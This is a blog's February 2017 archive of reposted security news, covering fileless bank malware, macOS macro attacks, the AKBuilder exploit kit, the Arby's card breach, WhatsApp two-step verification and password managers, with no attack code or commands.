Monthly Archives: February 2017

More than a hundred banks and financial institutions across the world have been infected with a dangerous sophisticated, memory-based malware that’s almost undetectable, researchers warned.

 
Newly published report by the Russian security firm Kaspersky Lab indicates that hackers are targeting banks, telecommunication companies, and government organizations in 40 countries, including the US, South America, Europe and Africa, with Fileless malware that resides solely in the memory of the compromised computers.

 
Fileless malware was first discovered by the same security firm in 2014, has never been mainstream until now.

Fileless malware is a piece of nasty software that does not copy any files or folder to the hard drive in order to get executed. Instead, payloads are directly injected into the memory of running processes, and the malware executes in the system’s RAM.

 
Since the malware runs in the memory, the memory acquisition becomes useless once the system gets rebooted, making it difficult for digital forensic experts to find the traces of the malware.

The attack was initially discovered by a bank’s security team after they found a copy of Meterpreter — an in-memory component of Metasploit — inside the physical memory of a Microsoft domain controller.

After conducting a forensic analysis, Kaspersky researchers found that the attackers leveraged Windows PowerShell to load the Meterpreter code directly into memory rather than writing it to the disk.

 
The cyber crooks also used Microsoft’s NETSH networking tool to set up a proxy tunnel for communicating with the command and control (C&C) server and remotely controlling the infected host.

They also stashed the PowerShell commands into the Windows registry in an effort to reduce nearly all traces of the attacks left in logs or hard drive after a reboot of the device, making detection and forensic analysis difficult.

The ultimate goal of the attackers was apparently aimed at compromising computers that control ATMs so that they could steal money.
Kaspersky Lab researchers plan to reveal more details in April about the attack, which is occurring on an industrial scale worldwide.

 
The attack has already hit more than 140 enterprise networks in business sectors, with most victims located in the US, France, Ecuador, Kenya, the UK, and Russia. And since the threat is so hard to spot, the actual number is likely much higher.

via:  thehackernews

Your web browsing history contains enough information for third parties to be able to link it to your social media profile (Twitter, Facebook, Reddit), Stanford and Princeton researchers have found.

Worrying research results

“Our approach is based on a simple observation: each person has a distinctive social network, and thus the set of links appearing in one’s feed is unique. Assuming users visit links in their feed with higher probability than a random user, browsing histories contain tell-tale marks of identity,” they shared.

They tested their approach first on simulated browsing histories containing links originating from Twitter, then in practice with the help of 374 individuals who chose to participate in the research and “donate” their browsing histories.

The result of that last test? Over 70 percent of the individuals were correctly tied to their Twitter accounts. While not perfect, the result is impressive, and even more so because a correctly identified account is one of over 300+ million opened on Twitter.

Granted, users are not expected to hand over their browsing history to anyone who would like to peruse them, but for this approach to be successful they don’t have to.

“Several online trackers [e.g. Google, Facebook, ComScore, AppNexus] are embedded on sufficiently many websites to carry out this attack with high accuracy,” they noted, despite claims by ad tech companies that online tracking is not a threat to user privacy.

How to protect your privacy?

“Any social media site can be used for such an attack, provided that a list of each user’s subscriptions can be inferred, the content is public, and the user visits sufficiently many links from the site. For example, on Facebook subscriptions can be inferred based on ‘likes,’ and on Reddit based on comments, albeit incompletely and with some error,” the researchers explained.

“Further, it is inherent in the web’s design and users’ behavior, and is not due to specific, fixable vulnerabilities by browsers or websites, unlike previous de-anonymization attacks. It simultaneously confirms the fingerprintability of browsing profiles and the easy availability of auxiliary information. Application-layer de-anonymization has long been considered the Achilles’ heel of Tor and other anonymity systems, and our work provides another reason why that is the case,” they concluded.

The researchers’ approach is less potent if employed by network adversaries – Internet service providers, open Wi-Fi network sniffers, state actors – because of the increasingly widespread adoption of HTTPS. When basing their testing just on HTTP requests, of the 374 individuals who participated in the research only 31% were tied correctly to their Twitter account.

“We hypothesize that the attack will still work in this scenario but will require a greater number of links per user,” they noted, and added that tools like HTTPS Everywhere can help make the attack harder and more time-consuming to execute.

Unfortunately, HTTPS is no protection against third-party trackers. To make their task harder users will have to use tracker-blocking tools such as Ghostery, uBlock Origin, or Privacy Badger, and/or give up social media accounts, especially if they are opened under their real name.

via:  helpnetsecurity

After targeting Windows-based computers over the past few years, hackers are now shifting their interest to Macs as well.

The emergence of the first macro-based Word document attack against Apple’s macOS platform is the latest example to prove this.

 
The concept of Macros dates back to 1990s. You might be familiar with the message that reads: “Warning: This document contains macros.“

 
Macro is a series of commands and actions that help automate some tasks. Microsoft Office programs support Macros written in Visual Basic for Applications (VBA), but they can also be used for malicious activities like installing malware.

Until now, hackers were cleverly using this technique to target Windows.

 
However, security researchers have now detected the first in-the-wild instance of hackers are making use of malicious macros in Word documents to install malware on Mac computers and steal your data – an old Windows technique.

The hack tricks victims into opening infected Word documents that subsequently run malicious macros. One such malicious Word file discovered by the researcher was titled “U.S. Allies and Rivals Digest Trump’s Victory – Carnegie Endowment for International Peace.docm.“

 
However, after clicking on the malicious Word document and before running it on your system, Mac users are always prompted to enable macros.

 
Denying permission can save you, but if enabled ignoring warnings, the embedded macro executes a function, coded in Python, that downloads the malware payload to infect the Mac PCs, allowing hackers to monitor webcams, access browser history logs, and steal password and encryption keys.

According to a blog post published this week by Patrick Wardle, director of research at security firm Synack, the Python function is virtually identical to EmPyre – an open source Mac and Linux post-exploitation agent.

“It’s kind of a low-tech solution, but on one hand it’s abusing legitimate functionality so it’s not going to crash like a memory corruption or overflow might, and it’s not going to be patched out,” said Wardle.

Wardle tracked the IP address from which the malicious Word documents were spread to Russia and that IP has previously been associated with malicious activities like phishing attacks.

Another malicious attack discovered by researchers this week also relied on standard Windows techniques by prompting users to download and install a fake software update, but actually harvest the user Keychain, phish usernames and passwords, and other sensitive data.

 
The MacDownloader nasty virus presented itself as both an update for Adobe Flash and the Bitdefender Adware Removal Tool, which are always annoying and dismissed by most users.
This is what all attackers want. Once the user clicks on either reject the updates or just press yes to dismiss it once and for all, the malware gets the green signal to harvest user keychain, phish usernames and passwords, collect private and sensitive data, and then send them back to attackers.

Researchers have spotted macOS malware targeting mostly the defense industry and reported to have been used against a human rights advocate.

 
The best way to avoid these kinds of attacks is to just deny permission to enable macros from running when opening a suspicious Word document and avoid downloading software from third-party App Store or untrusted websites.

via:   thehackernews

A memory-based malware is using PowerShell scripts within the Windows registry and penetration testing tools to evade detection.

Security researchers at Kaspersky Lab came across the malware when they discovered code for Meterpreter, a post-exploitation tool of the Metasploit penetration testing software, inside the physical memory of a domain controller. Analysis of the malware, detected as MEM:Trojan.Win32.Cometer and MEM:Trojan.Win32.Metasploit, yielded PowerShell scripts used from within the Windows registry. Kaspersky’s researchers also found the attackers had used the NETSH network configuration scripting utility to tunnel traffic from the host to their command and control (C&C) server.

The scripts used by the attackers allocate memory and install Meterpreter to RAM. Using the SC utility, the attackers installed a malicious service to execute one of those scripts on the target computer. They then set up a tunneling service using NETSH to forward all network traffic to their C&C server, allowing them to steal passwords and sensitive information.

NETSH, SC, and PowerShell scripts all require privilege escalation. But that’s no hurdle for attackers who are familiar with Mimikatz, another Metasploit post-exploitation tool. They simply created a payload that allowed them to steal system administrators’ credentials.

As of this writing, the malware has affected 140 organizations located in 40 countries. It’s not clear if the same attacker targeted all those enterprises. That’s because attribution in this case is particularly difficult.

Kaspersky’s researchers elaborate on that point in a blog post:

“During our analysis of the affected bank we learned that the attackers had used several third level domains and domains in the .GA, .ML, .CF ccTLDs. The trick of using such domains is that they are free and missing WHOIS information after domain expiration. Given that the attackers used the Metasploit framework, standard Windows utilities and unknown domains with no WHOIS information, this makes attribution almost impossible.”

Nevertheless, some evidence suggests GCMAN and Carbanak could be the responsible parties.

This attack is detectable in RAM, network, and registry only. With that in mind, organizations should use Kaspersky’s indicators of compromise (IoCs) to protect against this malware. Should they come across it, they should remove the malware from their systems and then change all administrator passwords.

via:  tripwire

John Kelly, the new secretary of the Department of Homeland Security, testified that foreign travelers coming to the United States could be required to give up social media passwords to border officials as a condition of entry.

“We want to say, for instance, which websites do you visit, and give us your passwords, so we can see what they do on the internet,” he said at a Feb. 7 House Homeland Security hearing, his first congressional hearing since his Senate confirmation. “If they don’t want to give us that information, they don’t come in.”

Kelly noted that while this was “still a work in progress” and not necessarily “what we’re going to do right now,” he added that President Donald Trump’s freeze on entry to the U.S. by citizens of seven countries, “is giving us an opportunity… to get more serious than we have been about how we look at people coming into the United States.”

“These are the things we’re thinking about,” he said. “We can ask them for this kind of information, and if they truly want to come into America, then they’ll cooperate. If not, you know, next in line.”

DHS has already announced plans to seek social media data from travelers visiting the U.S. under the visa waiver program. That plan, first floated in June 2016, would authorize data collection of social media identifiers from travelers on the visa waiver program, which allows for visa-free travel by passport holders of more than 30 countries, mostly long-established U.S. allies and trading partners. Requesting passwords, as contemplated by Gen. Kelly, would be a more intensive form of social media vetting.

Kelly also took responsibility for the mismanaged rollout of Trump’s freeze, saying he should have delayed it “a day or two… so I could have talked to members of Congress.”

Kelly also provided an update on plans to construct a wall across the border with Mexico.

Without providing details on funding, Kelly said he would like to see aerostats, as well as improved “sensors on the ground” to track movement along the border, and expected the project to be “well underway within two years.”

“Some of the sensors are really kind of 1980s technology,” he said. “There’s better equipment on the market today, so we’re going to take a long, hard look at that.”

Kelly also said that he does “not believe” DHS will receive the 5,000 border patrol employees and the 10,000 new Immigration and Customs Enforcement employees, as laid out in Trump’s executive order, in the next few years.

The secretary said he would rather “get fewer” officers than lower standards. “We will add to the ranks as fast as we can, but we will not lower standards or training,” Kelly said.

via:  fcw

At last year’s Google I/O developer conference, Google introduced a new Awareness API that would allow for smarter applications that could understand where you were, what you were doing, what’s nearby, and even the weather, in order to more intelligently react to your current situation. Today, Google introduced a new application that’s taking advantage of this sort of data in order to…design you a dress.

Yes, a dress.

Uhhh???

Google says it teamed up with H&M’s digital fashion house Ivyrevel on a project dubbed “Coded Couture.”

Through a forthcoming Android application, users can consent to have their activity and lifestyle data monitored – by way of the Awareness API –  to create a their own, personalized, custom-made dress that’s ordered through the app. Excuse me, it’s officially called the “Data Dress,” says Google.

Specifically, the Android app being developed now will use the Snapshot API to monitor the person’s daily activity and lifestyle, including things like where they traveled, where they eat dinner or hang out with friends, the typical weather in the area, and more. This information is collected over a week’s time, then used to create a digitally tailored dress that can be bought within the app.

The idea is that you can translate your life and your lifestyle into a unique, wearable look. But in reality, the resulting creation mainly displays your routes and routines as lines on map, sans street labels and points of interest. Users can also choose which style of dress they want, whether a look for work, parties, or formal events.

Google says that the choice of material, color, embellishment used, and added details like belt and cuffs are data-driven, as well. For example, the material will be selected based on weather data like the temperature and the fit will be based on the wearer’s activity level.

This doesn’t seem like the best use case for the Awareness API’s capabilities, but there you have it.

Currently, the app is in a closed beta and being tested by a handful of style “influencers,” including  Ivyrevel’s co-founder Kenza Zouiten. Interested testers can also sign up to join a later trial ahead of the public release.

Previously, Google had shown off better examples of how the Awareness API could be used in apps, including real estate app Trulia’s smarter push notifications that alert you to open houses only if you’re nearby, walking and it’s nice outside. Another, Runkeeper, lets you tag your posts with the current weather, while a music streaming app Superplayer Music took advantage of the new tool to suggest music based on your activity and location – like workout music for the gym.

The custom dresses will start at $99, and the app will release later this year.

via:  techcrunch

WhatsApp is implementing a new two-step verification process to boost security for users. The optional security feature significantly increases the hurdles that a third-party would have to get over to break into a user’s account.

The feature, which has been in testing since November, is rolling out in stages. To turn on two-step verification, users need to log in to WhatsApp, navigate to Settings, then Account and enable Two-step verification.

If activated, users will need to enter a six-digit security code in addition to their phone number and text message or voice call verification. They will also be asked to enter their security code once every seven days. Should users forget their security code, they can register an email address with WhatsApp and use it to turn off two-step verification.

WhatsApp said : “We do not verify this email address to confirm its accuracy. We highly recommend you provide an accurate email address so that you’re not locked out of your account if you forget your passcode.”

Users who do not register an email address with WhatsApp will be able to log back into the service if they forget their two-step passcode, but only after seven days of last using WhatsApp.

WhatsApp said: “After seven days, your number will be permitted to reverify on WhatsApp without your passcode, but you will lose all pending messages upon reverifying — they will be deleted. If your number is reverified on WhatsApp after 30 days of last using WhatsApp, and without your passcode, your account will be deleted and a new one will be created upon successfully reverifying.”

The roll out of the improved security comes weeks after the revelation of a vulnerability in the implementation of WhatsApp’s encryption protocols.

via:  enterprise-security-today

Passwords are a pain. Actually, they’re more than that. They’re becoming unmanageable. The average person has dozens of passwords they have to keep track of. And that number is only growing as we sign up for more apps and online services. The situation is made even worse by sites and services that require users to change passwords frequently and by widespread hacking attacks that necessitate replacing passcodes.

Many people resort to simple tricks — using simple, easy to remember passwords; reusing favorite ones over and over; or slightly altering passwords by changing their order or substituting numbers for letters. But these passcodes are often easy to guess, and if your password on one site is compromised, a hacker can potentially gain access to your accounts on other sites.

As hopeless and frustrating as all this seems, there is a solution — using a password manager. I’ve been testing out a couple — after long resisting them – and am now wondering why I didn’t start using one sooner.

But a recent meeting with cybersecurity experts with the Electronic Frontier Foundation spurred me to finally start using a password manager.

Bill Budington, a security engineer and technologist at the EFF, recommended three different password managers — 1Password, LastPass and KeePassX. I focused on 1Password and LastPass, because they each are more complete products than KeePassX, which is an open-source effort whose different components are cobbled together.

Both LastPass and 1Password work similarly. They each store your passwords in a locker in the cloud. You set a master password — hopefully a long and strong one — that encrypts all your data within the locker.

Each of the two companies offer PC programs, browser plug-ins and mobile apps. When you access a website or service on your computer, each service will offer to remember your existing password or, if it’s already in their system, will automatically fill in your log-in information. If you ask them, both systems will also randomly create new, more secure passwords, allowing you to change their length or characters to meet the requirements of particular sites.

You can use LastPass for free. For $12 a year, you’ll get 1 gigabyte of storage and the ability to share passwords with up to five people in your family. By contrast, 1Password costs $35.88 a year for a single user and $59.88 for up to five users.

via:  enterprise-security-today

Attackers continue to use Office exploits to proliferate malware, and SophosLabs has traced the activity to three popular exploit builders.

We described the first two – Microsoft Word Intruder and Ancalog Builder – in earlier papers. A new paper released today examines the third one: AKBuilder.

AKBuilder generates malicious Word documents, all in Rich Text, according to the paper’s author, SophosLabs principal researcher Gábor Szappanos. Once purchased, malicious actors use it to package malware samples into booby-trapped documents they can then spam out.

Like its two cousins, AKBuilder uses exploits to deliberately corrupt files that automatically trigger bugs in Office and underlying bugs in Windows itself.

AKBuilder is advertised in YouTube videos and sold in underground forums. The kit usually costs around $550 (payable in electronic currencies like Bitcoin and Perfect Money). Here’s an example (click to enlarge):

AKBuilder anatomy

Szappanos wrote about two variations of the kit, which are differentiated by the Office vulnerabilities they target. The earlier version, AK-1, uses two exploits in the same document: CVE-2012-0158 and CVE-2014-1761. The newer version, AK-2, uses a single exploit: CVE-2015-1641.

Both versions are released as a Python script. Everything is hardcoded and there is no configurable option apart from the file names, Szappanos wrote.

The script takes three parameters. The first parameter is the name of the payload file, the second is the name of the decoy document, and the final is the name of the generated exploit document.

All of the known builders have the same rough structure. The hardcoded exploit block with first- and second-stage shellcodes are stored as a huge data block in the script (click to enlarge):

The encrypted payload and decoy files are appended after the template content. This is a very rigid structure, an update to make any modification. The beginnings of the generated files up to the embedded payload are identical.

This can only serve as the “release build” of the builder. The script contains the entire document as a single block of data. This block is often modified by the author to avoid detection by antivirus engines. The modifications, though they could be done manually, are more likely done by an internal tool owned (and not released) by the author. This internal tool generates the highly obfuscated exploit document, which is then packaged in the Python script.

The kit is used by various cybercrime groups, distributing dozens of different malware families. The most active (or least careful) of these criminals are Nigerian BEC groups.

AK-1- and AK-2-generated documents are detected by Sophos as Troj/20141761-F , Troj/DocDrop-FK or Troj/DocDrop-JK.

Lifecycle

AK-1 was most active between the middle of 2015 and 2016. The emergence of its successor AK-2 seemed to spell the end of the kit’s lifespan. By the summer of 2016, it seemed extinct.

But we recently started to observe a resurrection of AK-1 samples. Szappanos said it’s too early to speculate, but thinks it can be associated with the disappearance of the Ancalog builder.

There was a significant market gap that needed the older Office exploits provided by AK-1, and when there is a need, there is a solution.

AK-2

Szappanos wrote about the characteristics of this kit back in a research paper published on Naked Security last year.

Like its predecessor, we are not aware of other public reports related to this exploit kit, thus, we have no official name for it.

The source code of the builder is based on the AK-1 builder Python script and it shows the same characteristics.

Distributed malware

SophosLabs identified about 760 malicious documents generated by AK-1, which were used to distribute more than 50 different malware families.

In its heyday, the most popular Trojans (Zbot, Chisburg, Fareit, Neurevt) were favored, but with the appearance of AK-2 these variants have slowed down somewhat. It appears a few diehard groups are still using the older version of the kit, but they are mostly deploying the PredatorPain keylogger (which is the most frequent benefiter of the kit) and the NetWiredRC backdoor.

The following chart shows the malware families distributed by AK-1 and AK-2:

Attribution

In case of AKBuilder, it is hard to tell how many individuals or groups are working on it. Because it is a simple Python script, it is very easy to steal the builder and start a new “development branch”. It is quite possible that the work was started by a single individual, and then others jumped in and stole the code, releasing their own versions.

It is clear though that the known builder versions come from the same origin and could be considered as belonging to the same development branch even though there are multiple email accounts connected to it.

Some of the distributors (including the most persistent one) are seemingly from the Arabic regions. There is no proof that there is any connection between them, though.

But apart from them, there are a handful of other, seemingly unrelated developers/distributors who sell versions of this kit. We suspect that most of them work independently, purchasing one version of the kit, then modifying and distributing it on their own. Some of them distribute only this kit, others seem to be involved in selling a wide range of malicious software builders.

This is possible because the release version of the kit is written in Python which makes it easy to understand and modify.

SophosLabs believes there are about half a dozen individuals who are involved in developing and distributing AKBuilder, but the exact connections between them is less clear.

Conclusion and defensive measures

Cyber-criminals find Office documents useful for delivering malicious programs to their targets. They’ve been using this method steadily over the past two years, and there is no sign that they intend to give up.

The availability of black-market tools makes it possible for a wide range of criminals to generate the exploited documents. After the disappearance of the Ancalog builder, AKBuilder took over as the most popular choice of these tools.

The rigid hard-coded structure of AKBuilder means that for any change in the generated samples, a new version must be released. That information helps the defenders: even if the first few samples go undetected, a quick signature update can protect the users for days or even weeks.

The dependence of criminals on the commercial offerings has a disadvantage for them: the builder doesn’t use zero-day exploits or even exploits that could be considered as new.

AKBuilder shows a moderate progressiveness: new exploits like CVE-2014-1761 and CVE-2015-1641 are supported relatively fast after their first availability. But the kit is far from using zero-day exploits, in both cases the first use of the exploit was months after the vulnerability was disclosed and the patch made available.

In the final analysis, it shouldn’t be difficult to protect against these kinds of activities: just applying recent patches for Microsoft Office should disarm the attack.

via:  sophos

Sources at nearly a half-dozen banks and credit unions independently reached out over the past 48 hours to inquire if I’d heard anything about a data breach at Arby’s fast-food restaurants. Asked about the rumors, Arby’s told KrebsOnSecurity that it recently remediated a breach involving malicious software installed on payment card systems at hundreds of its restaurant locations nationwide.

A spokesperson for Atlanta, Ga.-based Arby’s said the company was first notified by industry partners in mid-January about a breach at some stores, but that it had not gone public about the incident at the request of the FBI.

“Arby’s Restaurant Group, Inc. (ARG) was recently provided with information that prompted it to launch an investigation of its payment card systems,” the company said in a written statement provided to KrebsOnSecurity.

“Upon learning of the incident, ARG immediately notified law enforcement and enlisted the expertise of leading security experts, including Mandiant,” their statement continued. “While the investigation is ongoing, ARG quickly took measures to contain this incident and eradicate the malware from systems at restaurants that were impacted.”

Arby’s said the breach involved malware placed on payment systems inside Arby’s corporate stores, and that Arby’s franchised restaurant locations were not impacted.

Arby’s has more than 3,330 stores in the United States, and roughly one-third of those are corporate-owned. The remaining stores are franchises. However, this distinction is likely to be lost on Arby’s customers until the company releases more information about individual restaurant locations affected by the breach.

“Although there are over 1,000 corporate Arby’s restaurants, not all of the corporate restaurants were affected,” said Christopher Fuller, Arby’s senior vice president of communications. “But this is the most important point: That we have fully contained and eradicated the malware that was on our point-of-sale systems.”

The first clues about a possible breach at the sandwich chain came in a non-public alert issued by PSCU, a service organization that serves more than 800 credit unions.

The alert sent to PSCU member banks advised that PSCU had just received very long lists of compromised card numbers from both Visa and MasterCard. The alerts stated that a breach at an unnamed retailer compromised more than 355,000 credit and debit cards issued by PCSU member banks.

“PSCU believes the alerts are associated with a large fast food restaurant chain, yet to be announced to the public,” reads the alert, which was sent only to PSCU member banks.

Arby’s declined to say how long the malware was thought to have stolen credit and debit card data from infected corporate payment systems. But the PSCU notice said the breach is estimated to have occurred between Oct. 25, 2016 and January 19, 2017.

Such a large alert from the card associations is generally a sign of a sizable nationwide breach, as this is likely just the first of many alerts Visa and MasterCard will send to card-issuing banks regarding accounts that were compromised in the intrusion. If history is any lesson, some financial institutions will respond by re-issuing thousands of customer cards, while other (likely larger) institutions will focus on managing fraud losses on the compromised cards.

The breach at Arby’s comes as many credit unions and smaller banks are still feeling the financial pain from fraud related to a similar breach at the fast food chain Wendy’s. KrebsOnSecurity broke the news of that breach in January 2016, but the company didn’t announce it had fully removed the malware from its systems until May 2016. But two months after that the company was forced to admit that many Wendy’s locations were still compromised.

B. Dan Berger, president and CEO of the National Association of Federal Credit Unions, said the number of cards that PSCU told member banks were likely exposed in this breach is roughly in line with the numbers released not long after news of the Wendy’s breach broke.

“Hundreds of thousands of cards is a big number, and with the Wendy’s breach, the alerts we were getting from Visa and MasterCard were in the six-digit ranges for sure,” Berger said. “That’s probably one of the biggest numbers I’ve heard.”

Berger said the Wendy’s breach was especially painful because the company was re-compromised after it scrubbed its payment systems of malicious software. Many banks and credit unions ended up re-issuing customer cards several times throughout last year after loyal Wendy’s customers re-compromised their brand new cards again and again because they routinely ate at multiple Wendy’s locations throughout the month.

“We had institutions that stopped approving debit and credit transactions through Wendy’s when they were still dealing with that breach,” Berger said. “Our member credit unions were eating the costs of fraud on compromised cards, and on top of that having to re-issue the same cards over and over.”

Point-of-sale malware has driven most of the major retail industry credit card breaches over the past two years, including intrusions at Target and Home Depot, as well as breaches at a slew of point-of-sale vendors. The malware sometimes is installed via hacked remote administration tools like LogMeIn; in other cases the malware is relayed via “spear-phishing” attacks that target company employees. Once the attackers have their malware loaded onto the point-of-sale devices, they can remotely capture data from each card swiped at that cash register.

Thieves can then sell that data to crooks who specialize in encoding the stolen data onto any card with a magnetic stripe, and using the cards to purchase high-priced electronics and gift cards from big-box stores like Target and Best Buy.

Readers should remember that they’re not liable for fraudulent charges on their credit or debit cards, but they still have to report the unauthorized transactions. There is no substitute for keeping a close eye on your card statements. Also, consider using credit cards instead of debit cards; having your checking account emptied of cash while your bank sorts out the situation can be a hassle and lead to secondary problems (bounced checks, for instance).

via:  krebsonsecurity